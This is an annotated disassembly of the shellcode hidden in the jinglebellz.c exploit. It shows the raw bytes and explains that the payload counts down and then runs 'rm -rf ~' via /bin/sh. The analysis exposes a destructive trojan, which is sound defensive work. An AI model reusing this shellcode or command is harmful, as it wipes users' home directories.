; ; disassemble & decode of gobbles linux_shellcode from jinglebellz.c ; Jirka Kosina & Tomas Kouba ; ; ;"\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f" ;"\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43" ;"\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35" ;"\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72" ;"\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0" ;"\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66" ;"\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd" ;"\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd" ;"\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31" ;"\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58" ;"\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41" ;"\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69" ;"\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23" ;"\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31" ;"\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb" ;"\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd" ;"\x80\x31\xdb\x31\xc0\x40\xcd\x80"; ; ; ; ; This shellcode ; ; 1) prints banner "rm -rf ~ in 5 seconds.. CTRL-c to abort" ; 2) calls nanosleep() for 1 second 5 times ; (interrupting it with CTRL-c only speeds up the cycle (so it will last ; less than 5 seconds, but doesn't stop anything) ; 3) after this waiting cycle is done, it performs "rm -rf ~" through ; execve() syscall and running /bin/sh ; xor %eax,%eax xor %ebx,%ebx xor %ecx,%ecx xor %edx,%edx mov $0x3b,%al push %eax xor %eax,%eax push $0xa74726f push $0x6261206f push $0x7420632d push $0x4c525443 push $0x202e2e73 push $0x646e6f63 push $0x65732035 push $0x206e6920 push $0x7e206672 push $0x2d206d72 mov $0x2,%bl mov %esp,%ecx ; "rm -rf ~ in 5 seconds.. CTRL-c to abort" mov $0x29,%dl ; strlen mov $0x4,%al ; write int $0x80 ; sys_write(2, "rm -rf ~ in 5 seconds.. CTRL-c to abort", 41) xor %eax,%eax xor %edi,%edi mov $0x5,%al mov %eax,%edi ; edi = 5 xor %eax,%eax ; this is the target from "jne" below xor %ebx,%ebx xor %ecx,%ecx xor %edx,%edx mov $0x5070,%dx push %edx mov $0x2,%bl mov %esp,%ecx xor %edx,%edx mov $0x2,%dl mov $0x4,%al int $0x80 ; sys_write(2, "pP", 2); xor %eax,%eax xor %ebx,%ebx xor %ecx,%ecx ; eax = ebx = ecx = 0 push %eax inc %eax push %eax mov %esp,%ebx mov $0xa2,%al int $0x80 ; sys_nanosleep() for 1 second dec %edi ; edi-- xor %eax,%eax cmp %eax,%edi jne 0x804a1f1 xor %ebx,%ebx xor %ecx,%ecx xor %edx,%edx push $0x587e2066 push $0x722d206d push $0x7258632d push $0x41414141 push $0x41414141 push $0x41414141 push $0x41414141 push $0x4368732f push $0x6e69622f ; /bin/shCAAAAAAAAAAAAAAAA-cXrm -rf ~X xor %eax,%eax mov %al,0x7(%esp,1) ; 0 goes instead of C mov %al,0x1a(%esp,1) ; 0 goes instead of X mov %al,0x23(%esp,1) ; mov %esp,0x8(%esp,1) ; esp goes instead of A xor %ebx,%ebx lea 0x18(%esp,1),%ebx ; ebx = esp '-' mov %ebx,0xc(%esp,1) ; instead of fifth A character ; is written ebx - address of '-' char xor %ebx,%ebx lea 0x1b(%esp,1),%ebx ; ebx = rm address mov %ebx,0x10(%esp,1) ; ebx goes to place of 9th A mov %eax,0x14(%esp,1) ; rest of As replaced by rm address xor %ebx,%ebx ; ebx = 0 mov %esp,%ebx ; ebx = esp lea 0x8(%esp,1),%ecx ; ecx points to 1. A - effectively esp ; xor %edx,%edx lea 0x14(%esp,1),%edx ; edx pointing to rm (last four 'A's) mov $0xb,%al int $0x80 ; execve("/bin/sh", {"/bin/sh", "-c", "rm -rf ~", NULL}, {"rm -rf ~", NULL}) - xor %ebx,%ebx ; ebx = eax = 0 xor %eax,%eax inc %eax ; exit() int $0x80